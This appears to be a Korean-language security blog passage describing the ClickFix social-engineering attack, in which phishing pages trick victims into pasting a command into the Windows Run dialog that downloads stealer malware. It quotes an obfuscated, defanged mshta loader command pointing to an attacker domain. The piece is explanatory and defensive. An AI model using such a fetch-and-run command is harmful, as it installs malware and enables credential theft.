13. ClickFix Attack

ClickFix 공격 기법은 지난 2024년 3월경 처음 발견되었다. 해당 공격은 Malvertising 공격 중 하나로도 분류된다. 공격은 아래와 같이 이루어진다.

 

1. 피싱 사이트에 피해자가 접속

2. 접속 사이트에서 미상의 이유로 "Fix it" 등의 버튼을 누르도록 유도

3. 버튼 클릭 유도와 함께 클릭 후 명령어를 실행하도록 안내문 노출

4. 페이지 안내대로 수행 시, 추가 스틸러 등 다운로드 및 실행

 

위 과정에서 볼 수 있듯 사회공학적 요소가 다분히 존재한다. 아래 그림은 sekoia 에서 공개한 4가지 ClickFix 공격의 유형이다. 아래 그림에서 볼 수 있듯 "윈도우 + R" (실행 프로그램 시작 단축키)를 실행 후 명령어를 복사하고 명령어를 실행하도록 유도한다.

ClickFix 유형 / 출처:sekoia (https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/)

윈도우 + R 단축키 실행 화면

 

비슷한 사례로, proofpoint 에서 공개한 아래 내용도 존재한다. 아래 내용은 메일로 피해자의 악성코드 다운로드를 유도하는 내용이다. 메일 내용에 파워쉘을 실행하도록 유도하고 있는 것을 볼 수 있다.

다른 유형의 ClickFix 공격 / 출처:proofpoint (https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape)

 

공격자가 피해자에게 "실행"에 입력하도록 유도하는 명령어는 보통 아래와 같은 추가 악성코드 다운로드 명령어이다.

var _0xA = "aHR0cHM6Ly9zb2tvbGlhLnNob3AvbGFkZXJ1cGZ1bi5tcDM=";
var _0xB = atob(_0xA);
var _0xC = "mshta https://sokolia[.]shop/ladderupfun[.]mp3 # 'I am not a robot: CAPTCHA Verification UID: 885203'

 

 

현재까지는 AMOS Stealer, Rhadamanthys Stealer, Lumma Staler 등 스틸러 계열의 악성코드를 추가로 다운로드 및 실행하는 경우가 대부분이었던 것으로 보인다. 하지만, 이 기법은 피해자 PC에 공격자가 의도한 명령어를 입력하도록 유도하기 때문에 레지스트리 접근도 충분히 가능해보인다. 즉, 백신 등을 종료시킨 후 자유자재로 의도한 악성코드를 유포할 수 있을 것으로 보여진다. 악성코드 유포 url의 선제 차단 등의 방어가 필요할 것으로 생각된다.